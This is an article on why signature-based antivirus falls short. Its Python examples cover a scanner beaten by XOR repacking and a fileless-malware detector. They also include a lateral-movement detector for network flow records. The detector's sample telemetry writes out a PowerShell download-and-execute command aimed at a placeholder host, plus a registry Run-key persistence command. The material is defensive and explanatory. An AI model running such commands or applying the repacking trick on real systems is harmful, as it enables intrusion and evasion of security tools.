Traditional antivirus software appears to have reached the end of the road. Put differently, on its own it can no longer adequately protect the systems it is installed on. Some will find that statement controversial and others will reject it outright, but the pace of change within the cyber security industry strongly suggests it is true.
Before this article tries to put the argument to bed and show that traditional antivirus products are no longer fit for purpose, it is important to define what a traditional antivirus product is. By traditional is meant any antivirus product that relies primarily on signature-based detection to prevent malware infections.
The Signature Problem
Over the years it has become apparent that the signature-based approach suffers from some inherent problems. The first can be described as the sacrificial lamb problem: a machine has to be infected by a malware strain before a sample can be reverse engineered and a signature developed, so that other users can be protected.
The newly developed signature is then pushed out to endpoints so that they are protected from that strain. For the end user this means that when a malware scan runs, the software can detect instances of that malware and of every other strain for which a signature exists. Producing the signature takes time and requires human experts to reverse engineer the sample, and both work to the attacker's advantage. Worse, simply repacking the malware, changing its code, or changing its delivery method can render the previous signature obsolete and unable to detect the newer version, so the cycle of sacrificial lamb, reverse engineering, signature development, and signature push begins again.
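The following Python script is an added illustration of that cycle, not code from the original article. It plays both sides: a scanner in the style of a traditional engine that matches a whole-file hash and fixed byte patterns, and the attacker's cheapest repack, a single-byte XOR behind a decode stub. The sample bytes, the stub marker and the signature name are constructed placeholders; nothing in the sample is executable.

```python
"""Added example (not from the original article): why a signature is brittle.

A minimal scanner in the style of a traditional antivirus engine, matching
file hashes and fixed byte patterns, run against a constructed, inert
stand-in for a malware sample and against the same sample after the
cheapest possible repack (a single-byte XOR behind a decode stub).
"""
import hashlib

# Constructed sample: inert bytes that merely resemble what an analyst
# would carve a signature from. Nothing here is executable.
ORIGINAL_SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 28
    + b"cmd.exe /c vssadmin delete shadows /all /quiet\x00"
    + b"YOUR FILES ARE ENCRYPTED. Contact decrypt@example.invalid\x00"
)

# Two signature styles a traditional engine ships after the first victim's
# sample has been analysed: a whole-file hash and byte patterns.
HASH_SIGNATURES = {hashlib.sha256(ORIGINAL_SAMPLE).hexdigest(): "Ransom.Example.A"}
BYTE_SIGNATURES = {
    b"vssadmin delete shadows": "Ransom.Example.A",
    b"YOUR FILES ARE ENCRYPTED": "Ransom.Example.A",
}

STUB = b"STUB:xor-decode-then-run:"  # hypothetical unpacking-stub marker


def scan(blob: bytes) -> list:
    """Return every signature that matches blob, traditional-AV style."""
    hits = []
    digest = hashlib.sha256(blob).hexdigest()
    if digest in HASH_SIGNATURES:
        hits.append("hash:" + HASH_SIGNATURES[digest])
    for pattern, name in BYTE_SIGNATURES.items():
        if pattern in blob:
            hits.append("bytes:" + name)
    return hits


def repack(sample: bytes, key: int = 0x5A) -> bytes:
    """The attacker's cheapest move: XOR the whole body and prepend a stub.

    Real packers are far more elaborate, but a single-byte XOR already
    rewrites every byte of the payload, so neither the hash nor any byte
    pattern taken from the original survives on disk.
    """
    return STUB + bytes(b ^ key for b in sample)


def unpack(packed: bytes, key: int = 0x5A) -> bytes:
    """What the stub does in memory at run time: restore the original."""
    return bytes(b ^ key for b in packed[len(STUB):])


if __name__ == "__main__":
    packed = repack(ORIGINAL_SAMPLE)
    print("original on disk :", scan(ORIGINAL_SAMPLE))
    print("repacked on disk :", scan(packed))          # nothing fires
    print("repacked, in mem :", scan(unpack(packed)))  # the old signatures fire again
```

The last line is the point: the signatures are still perfectly good, but only against what the payload looks like once it has unpacked itself in memory, which is exactly where a disk-scanning engine is not looking.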
These shortfalls have been further exacerbated by initial access brokers and the Ransomware-as-a-Service model. As one group of security researchers put it,
“Add to that the increase in Initial Access Brokers selling backdoors to compromised organizations, the RaaS (Ransomware-as-a-Service) operations that allow even the technically challenged to set up and execute a ransomware attack campaign, and all the other players in the ransomware economy who are pushing the ransom demands into the tens-of-millions of dollars, and we have a problem for which more advanced solutions are required.”
The Malware Arms Race
The sacrificial lamb model described above, together with the time and human resources needed to develop each signature, simply cannot keep up with the influx of new malware strains, let alone the rate at which existing malware is updated and released back into the wild. Some ten years ago, traditional antivirus packages did a good job of defending against the vast majority of malware seen in the wild.
This was due in part to malware at that time being written by “adolescent cyber vandals”, whose aim was to show off their coding skills and satisfy their curiosity. Those adolescents are now adults with a skill set that can earn them a great deal of money, illicitly earned but money nonetheless. Their skills have matured, and with the wider software industry's push to shorten the path from planning to deployment, a true malware arms race is under way. Further, some of those former vandals now lead major state-sponsored groups that are well funded and protected by their respective governments. The firm that coined the phrase “adolescent cyber vandals” went on to say,
“More than 75% of malicious programs – i.e. the overwhelming majority – are created by the criminal computer underground, with the aim of infecting a defined number of computers on the Internet. The number of new viruses and Trojans is now increasing every day by a few hundred – the Kaspersky Virus Lab receives between 200 and 300 new samples a day.”
This argument does not even consider what machine learning and AI bring to the table in vastly shortening development times. If traditional antivirus solutions cannot keep up today with their current methodology, for example the time it takes to develop a signature for a newly discovered remote access trojan, push the update to customers, and then repeat the whole process for each variant of that trojan, what chance do they have against tomorrow's threats developed in record time? We have all seen the articles about software developers leveraging ChatGPT to make their jobs easier; it would be naive to think threat actors are not doing the same.
The Scourge of Fileless Malware
The advent of fileless malware, a broad category of malware whose common trait is that the malicious components are never written to the hard disk of the infected machine, highlights why traditional antivirus packages are not fit for purpose. Fileless malware abuses legitimate applications to execute malicious scripts: the payload is typically run from memory via PowerShell or another trusted application, and persistence is achieved not by dropping a file but by storing the launcher somewhere the operating system will re-execute it at boot, such as a registry value, a scheduled task or a WMI event subscription.
As nothing is written to disk, there is nothing for a scheduled or user-initiated virus scan to find. Further, antivirus software trusts (whitelists) legitimate applications, so activity initiated by those applications raises no suspicion even when they are being abused. This is compounded by fileless malware developers tying execution to critical operating system components, areas in which the antivirus application often has little or no visibility.
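To show what visibility into behaviour rather than files looks like, the following Python script is an added example and not part of the original article. It runs a handful of behavioural rules over constructed endpoint events that are only loosely shaped like Sysmon process-creation and registry-set records (an assumption, not a real log format): it decodes a PowerShell -EncodedCommand, looks for download-and-execute primitives, flags PowerShell spawned by an Office application, and catches a Run-key value that relaunches PowerShell at boot. The URL, host names and registry paths in the sample events are placeholders.

```python
"""Added example (not from the original article): finding fileless activity
in endpoint telemetry instead of on disk.

The events below are constructed and only loosely shaped like Sysmon
process-creation and registry-set records (an assumption, not a real log).
The rules decode -EncodedCommand, look for download-and-execute primitives,
flag PowerShell spawned by an Office application, and catch a Run-key value
that relaunches PowerShell at boot. None of this requires a file to scan.
"""
import base64
import re
from typing import Optional

# Fragments that are legitimate on their own but, together, indicate
# in-memory execution of a script that never touched disk.
SUSPICIOUS_TOKENS = (
    "invoke-expression", "iex", "downloadstring", "frombase64string",
    "-windowstyle hidden", "-w hidden", "-noprofile", "-nop",
)
OFFICE_PARENTS = ("winword.exe", "excel.exe", "outlook.exe")
RUN_KEY = r"\software\microsoft\windows\currentversion\run"


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand (or -enc/-ec/-e).

    PowerShell expects base64 of UTF-16LE text, so a decoder that assumed
    UTF-8 would turn the payload into nonsense and miss every token.
    """
    m = re.search(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event: dict) -> list:
    """Apply the behavioural rules to one event and return finding names."""
    findings = []
    if event["type"] == "process":
        cmdline = event["cmdline"]
        text = cmdline.lower()
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            findings.append("encoded_command")
            text += " " + decoded.lower()  # inspect what will actually run
        hits = [t for t in SUSPICIOUS_TOKENS if t in text]
        if hits:
            findings.append("suspicious_tokens:" + ",".join(hits))
        if "powershell" in text and event.get("parent", "").lower() in OFFICE_PARENTS:
            findings.append("office_spawned_powershell")
    elif event["type"] == "registry":
        if RUN_KEY in event["target"].lower() and "powershell" in event["details"].lower():
            findings.append("run_key_powershell_persistence")
    return findings


def triage(events: list) -> dict:
    """Map event id -> findings for every event that produced at least one."""
    return {e["id"]: f for e in events if (f := analyse_event(e))}


# Constructed sample telemetry. The URL, paths and parent names are placeholders.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage2.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
EVENTS = [
    {"id": 1, "type": "process", "parent": "explorer.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"id": 2, "type": "process", "parent": "winword.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"id": 3, "type": "registry",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": 'powershell.exe -w hidden -c "iex ([Text.Encoding]::Unicode.GetString('
                '[Convert]::FromBase64String((gp HKCU:\\Software\\Classes\\blob).data)))"'},
]

if __name__ == "__main__":
    for event_id, findings in triage(EVENTS).items():
        print(event_id, findings)
```

Event 3 is the registry-resident pattern described above: the only thing on disk is a Run-key value that rebuilds the payload from another registry blob at logon, so a file scan has nothing to match while the registry-set event makes it obvious.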
Modern Solutions to the Problem
These limitations have been known for some time, and security firms have developed three technologies that address the failings of the now-outdated products: Endpoint Detection and Response (EDR), Network Detection and Response (NDR), and Next-Generation Antivirus (NGAV).
EDR – Endpoint Detection & Response
The term was initially coined by Gartner to mean a security solution that,
“…records and stores endpoint-system-level behaviors, uses various data analytics techniques to detect suspicious system behavior, provides contextual information, blocks malicious activity, and provides remediation suggestions to restore affected systems.”
EDR operates on the principle that every system and workload on an endpoint, and across the wider network, needs to be visible to both the security software and the human security professionals if a system is to be truly protected. To that end an EDR needs to be holistic and, to make a difference compared with the antivirus software of a few years ago, offer the following features: incident data search and investigation, alert triage, suspicious activity validation, threat hunting, and malicious activity detection and containment.
However, EDR primarily focuses on detecting and responding to threats at the endpoint level and lacks the ability to monitor and analyze network-level traffic and detect threats that may go unnoticed at the endpoint. This is where NDR comes in.
NDR – Network Detection & Response
NDR solutions are designed to monitor, analyse, and detect threats at the network level. By inspecting network traffic, NDR tools can identify anomalies, suspicious patterns, and indicators of compromise (IOCs) that may indicate a potential cyber attack. NDR provides organisations with a holistic view of their network, helping them identify threats that may have bypassed traditional security measures and gained a foothold in the network infrastructure. As a practical example, the technology allows for the detection of lateral movement, the type favored by threat actors when compromising enterprise networks.
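The lateral movement case is worth making concrete. The following Python script is an added example, not the article's or any vendor's code: it runs a fan-out rule over constructed flow records, tuples of (source, destination, destination port, timestamp in seconds) only loosely shaped like Zeek conn.log fields (an assumption). One source reaching many distinct hosts on administrative ports inside a short sliding window is flagged as a sweep, while the same number of connections from a backup server spread over hours is not. The addresses, ports and thresholds are placeholders to be tuned to a real network.

```python
"""Added example (not from the original article): detecting lateral-movement
fan-out from network flow records, the kind of signal NDR works from.

Flows are constructed tuples (src, dst, dst_port, timestamp_seconds), only
loosely shaped like Zeek conn.log fields (an assumption). The rule is a
sliding window over each source's connections to administrative ports.
"""
from collections import Counter, defaultdict

ADMIN_PORTS = {445: "SMB", 135: "RPC", 3389: "RDP", 5985: "WinRM", 22: "SSH"}


def find_fanout(flows, window=300, min_targets=5):
    """Return {src: alert} for every source that reached at least
    min_targets distinct hosts on admin ports within any window-second span."""
    by_src = defaultdict(list)
    for src, dst, dport, ts in flows:
        if dport in ADMIN_PORTS:
            by_src[src].append((ts, dst, dport))

    alerts = {}
    for src, events in by_src.items():
        events.sort()
        in_window = Counter()  # dst -> flows currently inside the window
        left = 0
        for right, (ts, dst, _) in enumerate(events):
            in_window[dst] += 1
            while ts - events[left][0] > window:  # slide the left edge forward
                old = events[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            targets = len(in_window)
            if targets >= min_targets and targets >= alerts.get(src, {}).get("targets", 0):
                alerts[src] = {
                    "targets": targets,
                    "ports": sorted({ADMIN_PORTS[p] for _, _, p in events[left:right + 1]}),
                    "first": events[left][0],
                    "last": ts,
                }
    return alerts


# Constructed flows. Timestamps are seconds into the day; addresses are placeholders.
FLOWS = (
    # Normal: twenty clients each open one SMB session to the file server.
    [("10.0.1.%d" % i, "10.0.2.5", 445, 32400 + i * 37) for i in range(10, 30)]
    # Normal: the backup server touches each host once, roughly 45 minutes apart.
    + [("10.0.2.9", "10.0.1.%d" % i, 445, 3600 + i * 2700) for i in range(10, 18)]
    # Suspicious: one workstation sweeps twenty hosts over SMB and RPC in about two minutes.
    + [("10.0.1.20", "10.0.1.%d" % i, 445, 52000 + i * 3) for i in range(30, 50)]
    + [("10.0.1.20", "10.0.1.%d" % i, 135, 52100 + i * 3) for i in range(30, 40)]
)

if __name__ == "__main__":
    for src, alert in find_fanout(FLOWS).items():
        print(src, alert)
```

The window and threshold are the whole detection: widen the window to six hours and lower the threshold to eight and the backup server is flagged too, which is why NDR rules need a baseline of what each host normally talks to rather than fixed numbers.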
NGAV – Next Gen Anti-Virus
Next-Generation Antivirus goes beyond known file-based malware signatures and heuristics. It is system-centric, typically cloud-managed, and uses predictive analytics driven by machine learning and artificial intelligence, combined with threat intelligence, to provide the following improved security features:
- Detect and prevent malware and fileless non-malware attacks
- Identify malicious behavior and TTPs from unknown sources
- Collect and analyze comprehensive endpoint data to determine root causes
- Respond to new and emerging threats that would previously have gone undetected.
None of these technologies should be viewed in isolation. EDR, NDR, and NGAV complement one another and should be used together. As a practical example, EDR can surface even minute changes to files, registry keys and network connections that help security teams uncover malicious activity hidden in plain sight, which in turn improves threat intelligence gathering. That intelligence can then be passed swiftly to NGAV solutions to block attacks that would initially have slipped past them because there was no actionable intelligence for the machine learning models to draw on, all while NDR monitors the broader network of which the endpoint forms a part.